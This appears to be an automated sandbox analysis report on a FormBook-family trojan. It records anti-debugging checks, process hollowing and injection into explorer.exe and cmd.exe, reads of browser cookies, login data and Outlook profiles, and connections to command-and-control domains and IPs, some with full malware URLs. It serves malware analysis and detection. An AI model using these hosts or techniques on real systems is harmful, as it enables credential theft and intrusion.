          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A5FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040CF93 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_004018B6 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_0040632B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00401BB3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 85.187.128.34 80
          Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.94 80
          Source: C:\Windows\explorer.exe | Network Connect: 45.33.30.197 80
          Source: C:\Windows\explorer.exe | Domain query: www.un-object.com
          Source: C:\Windows\explorer.exe | Domain query: www.energyservicestation.com
          Source: C:\Windows\explorer.exe | Network Connect: 78.141.192.145 80
          Source: C:\Windows\explorer.exe | Domain query: www.white-hat.uk
          Source: C:\Windows\explorer.exe | Domain query: www.thewildphotographer.co.uk
          Source: C:\Windows\explorer.exe | Domain query: www.shapshit.xyz
          Source: C:\Windows\explorer.exe | Network Connect: 81.17.18.198 80
          Source: C:\Windows\explorer.exe | Network Connect: 192.185.17.12 80
          Source: C:\Windows\explorer.exe | Domain query: www.thedivinerudraksha.com
          Source: C:\Windows\explorer.exe | Network Connect: 199.192.30.147 80
          Source: C:\Windows\explorer.exe | Domain query: www.bitservicesltd.com
          Source: C:\Windows\explorer.exe | Domain query: www.younrock.com
          Source: C:\Windows\explorer.exe | Domain query: www.gritslab.com
          Source: C:\Windows\explorer.exe | Network Connect: 161.97.163.8 80
          Source: C:\Windows\explorer.exe | Domain query: www.222ambking.org
          Source: C:\Windows\explorer.exe | Domain query: www.fclaimrewardccpointq.shop
          Source: C:\Windows\explorer.exe | Network Connect: 94.176.104.86 80
          Source: C:\Windows\explorer.exe | Network Connect: 213.145.228.111 80
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: D90000
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | Thread register set: target process: 3528
          Source: C:\Windows\SysWOW64\cmd.exe | Thread register set: target process: 3528
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | Process created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
          Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: EProgram Managerzx
          Source: explorer.exe, 00000004.00000000.327263504.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.574282998.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.446841530.000000000834F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.318203390.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.567226844.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progmanath
          Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | Code function: 1_2_004019C5 cpuid
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | Code function: 1_2_0040163B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe | Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          Source: Yara match | File source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\cmd.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

          Remote Access Functionality

          Source: Yara match | File source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          MITRE ATT&CK matrix, listed by tactic (the number in parentheses is the count the report attaches to that technique):

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: Native API (1); Shared Modules (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Privilege Escalation: Access Token Manipulation (1); Process Injection (512); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (11); Virtualization/Sandbox Evasion (2); Access Token Manipulation (1); Process Injection (512); Compile After Delivery; Indicator Removal from Tools
          Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: System Time Discovery (1); File and Directory Discovery (2); System Information Discovery (16); Security Software Discovery (141); Virtualization/Sandbox Evasion (2); Process Discovery (2); Application Window Discovery (1); Remote System Discovery (1)
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
          Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Command and Control: Ingress Tool Transfer (3); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (14); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Generate Fraudulent Advertising Revenue
          Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Data Encrypted for Impact


          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 830750 | Sample: SecuriteInfo.com.Trojan.Gar... | Startdate: 20/03/2023 | Architecture: WINDOWS | Score: 100

          Start
            Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 3 other signatures
            SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe 19 (started)
              Dropped file: C:\Users\user\AppData\Local\...\vfpbkeeo.exe, PE32
              vfpbkeeo.exe 1 (started)
                Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Machine Learning detection for dropped file; 2 other signatures
                vfpbkeeo.exe (started)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                  explorer.exe 1 (injected)
                    DNS/IP: un-object.com 192.185.17.12, 49713, 49714, 80 UNIFIEDLAYER-AS-1US United States; www.222ambking.org 91.195.240.94, 49701, 49702, 80 SEDO-ASDE Germany; 13 other IPs or domains
                    Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
                    cmd.exe 13 (started)
                      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
                conhost.exe (started)

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe | 42% | ReversingLabs | Win32.Trojan.FormBook |
SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe | 42% | Virustotal | | Browse
SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | 39% | ReversingLabs | Win32.Trojan.Lazy |

Source | Detection | Scanner | Label | Link | Download
3.2.vfpbkeeo.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
1.2.vfpbkeeo.exe.2080000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

Source | Detection | Scanner | Label | Link
www.bitservicesltd.com | 2% | Virustotal | | Browse
www.younrock.com | 1% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://www.energyservicestation.com/u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== | 100% | Avira URL Cloud | malware |
http://www.thedivinerudraksha.com/u2kb/ | 1% | Virustotal | | Browse
http://www.avisrezervee.com/u2kb/www.avisrezervee.com | 100% | Avira URL Cloud | malware |
http://www.mygloballojistik.online | 0% | Avira URL Cloud | safe |
http://www.thedivinerudraksha.com/u2kb/ | 100% | Avira URL Cloud | malware |
http://www.gritslab.com/u2kb/www.gritslab.com | 100% | Avira URL Cloud | malware |
http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk | 100% | Avira URL Cloud | malware |
http://www.germanreps.com | 0% | Avira URL Cloud | safe |
http://www.shapshit.xyz | 0% | Avira URL Cloud | safe |
http://www.ecomofietsen.com | 0% | Avira URL Cloud | safe |
http://www.white-hat.uk/u2kb/www.white-hat.uk | 100% | Avira URL Cloud | malware |
http://www.thedivinerudraksha.com | 0% | Avira URL Cloud | safe |
